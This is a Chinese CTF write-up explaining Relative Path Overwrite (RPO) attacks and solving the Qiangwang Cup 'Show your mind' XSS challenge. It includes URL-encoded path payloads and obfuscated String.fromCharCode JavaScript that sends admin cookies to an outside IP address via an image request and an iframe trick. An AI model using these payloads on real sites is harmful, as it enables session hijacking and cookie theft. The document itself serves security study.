RPO相对路径覆盖攻击

强网杯Show your mind学习到了一个新的知识点,复现过程很有意思,总结一篇文章

0x1定义

RPO(Relative Path Overwrite)相对路径覆盖,是一种利用相对URL路径覆盖目标文件的一种攻击手段。

此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。

0x2 问题原因:

在Nginx中,编码后的url服务器可以正常识别,也就是说服务器在加载文件时会解码后找到具体文件返回返回客户端。但是在客户端识别url时是不会解码的,如果某些静态资源文件使用相对路径,就很容易遭受RPO相对路径覆盖攻击.

我们现在本地测试一下demo:

加入我们在/test/a.html中的内容为:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <script src="b.js">
    </script>
</head>
<body>
    
</body>
</html>

客户端加载的静态资源是/test目录下的b.js文件,内容为:

document.write('<p>Hello,World</p>');

如果我们控制test下面aaa的目录下面的b.js的内容,写入/test/aaa/b.js内容如下

alert(1)

我们如果访问链接:http://localhost/test/aaa/..%2fa.html, 弹窗,成功加载/test/aaa/b.js中的内容

image.png

这就是相对路径覆盖攻击, 我们成功覆盖掉了a.html中静态资源b.js的路径.

0x3. 漏洞利用的情景

0x3.1 加载任意目录下静态资源文件

如上demo演示,我们可以加载任意目录下的b.js去覆盖a.html中静态资源b.js的路径

0x3.2 将任意文件内容按静态文件解析

在很多使用了url_rewrite的php开发框架以及python web框架中,经常使用相对路径来加载静态资源文件,而且url都有一个特征:

index.php/home/controller/action/key1/value1/key2/value2...

比如一篇文章的链接为 index.php/view/article/41801/ view是index.php中的方法,article和41801分别是传入的参数名和参数值.

如果我们在其后加上..2f..%2f/这样路径会如何, 服务端正常解码后返回/index.php/view页面的内容,但客户端不会解码, 所有采用相对路径的静态资源文件的父路径变成了index.php/view/article/41801/, 而在这个链接后面加上的路径都会被当做参数来解析,最后返回的还是index.php/view/article/41801/文章的内容

这样我们就完成了将任意文件内容按静态文件来解析的漏洞利用了.

一道RPO攻击的CTF题目解析

强网杯上的一道show your mind的xss题目

登陆进去后可以利用的地方有add和reports页面,通过/templates/add.html 可以查看到输出点都用了htmlspecialchars转义,没法正常插入html代码,reports页面也只能提交自己网站上的链接,发现网站用了pathinfo模式,而且网站静态js文件采用相对路径来访问, 很符合RPO攻击的条件,我们来测试一下

首先我们写入一篇文章:

标题为空,内容为: alert(1)

生成一个文章路径:http://39.107.33.96:20000/index.php/view/article/41801

我们在这个文章路径后面加上/..%2f..%2f..%2f, 然后在访问

image.png

成功弹窗,这是为什么呢?

因为根路径:/index.php 中有一个静态文件是用相对路径表示的:

<script src="static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>

当我们访问http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f..%2f链接的时候,服务端会正常解码, 跳转3个目录到index.php ,返回给我们对应的内容

问题来了, 客户端里的静态文件(css/js)如果是使用相对路径来表示的话, 如上,客户端并不会解码%2f, 而是将..%2f..%2f..%2f 当成一个文件来看待了, 那么上面那个js的相对路径就是http://39.107.33.96:20000/index.php/view/article/41801/

如果在`..%2f..%2f..%2f..%2f后加一个/,那么客户端就会当做一个目录,js的相对路径就不是/41801了

客户端寻找js的路径为:http://39.107.33.96:20000/index.php/view/article/41801/static/js/jquery.min.js

然而在pathinfo的模式下,static/js/jquery.min.js 会被当做参数,最后返回的还是该文章的页面,
即alert(1)的内容,这样相当于index.php中的js文件执行为:

<script src="http://39.107.33.96:20000/index.php/view/article/41801"></script>
<script src="http://39.107.33.96:20000/static/js/bootstrap.min.js"></script>

当然,在index.php/view中也存在相对路径,只不多是../static/js/jquery.min.js了, 同样是可以构造的: `http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f/``

这样服务端返回/index.php/view的内容, 客户端的静态文件加载的相对路径变成了http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f/..static/js/jquery.min.js

验证完确实存在xss攻击点,
于是我们写一篇文章,

js代码为:

(new Image()).src="http://123.206.65.167:2000/?a="+escape(document.cookie);

因为htmlspecialchars函数转义引号,因此我们可以利用编码绕过, 写入内容如下:

eval(String.fromCharCode(40, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 49, 50, 51, 46, 50, 48, 54, 46, 54, 53, 46, 49, 54, 55, 58, 50, 48, 48, 48, 47, 63, 97, 61, 34, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59))

将链接http://39.107.33.96:20000/index.php/view/article/708/..%2f..%2f/ 通过report页面发给管理员访问,拿到cookie:

image.png

在cookie中获取到HINT为: HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"
这里可以利用iframe指向该网页,因为窗口同源我们可以获取到子窗口的dom,因此写入内容如下:

<iframe src="/QWB_fl4g/QWB/" id="sir"></iframe><img src=0 onerror="this.src='http://123.206.65.167:2000/?a='+document.getElementById('sir').contentWindow.document.cookie">

编码为:

document.write(String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 47, 81, 87, 66, 95, 102, 108, 52, 103, 47, 81, 87, 66, 47, 34, 32, 105, 100, 61, 34, 115, 105, 114, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 60, 105, 109, 103, 32, 115, 114, 99, 61, 48, 32, 111, 110, 101, 114, 114, 111, 114, 61, 34, 116, 104, 105, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 49, 50, 51, 46, 50, 48, 54, 46, 54, 53, 46, 49, 54, 55, 58, 50, 48, 48, 48, 47, 63, 97, 61, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 115, 105, 114, 39, 41, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 34, 62))

注意上一个payload是js,所以可以直接用eval函数执行, 这个payload是html代码, 故用document.write函数写入到html dom中

发送给管理员链接,获取到该网页下的cookie:

image.png

内容为: flag=QWB{flag_is_f43kth4rpo}; HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"

参考:

http://blog.nsfocus.net/rpo-attack/

http://www.beesfun.com/2017/03/27/RPO%E6%94%BB%E5%87%BB/

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 150,983评论 1 330
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 64,298评论 1 272
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 101,178评论 0 222
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 42,481评论 0 190
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 50,631评论 3 269
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 39,631评论 1 191
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,072评论 2 290
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,797评论 0 180
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,349评论 0 224
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,903评论 2 232
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,268评论 1 241
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,737评论 2 231
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,212评论 3 219
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,818评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,407评论 0 179
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 34,465评论 2 248
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 34,519评论 2 247

推荐阅读更多精彩内容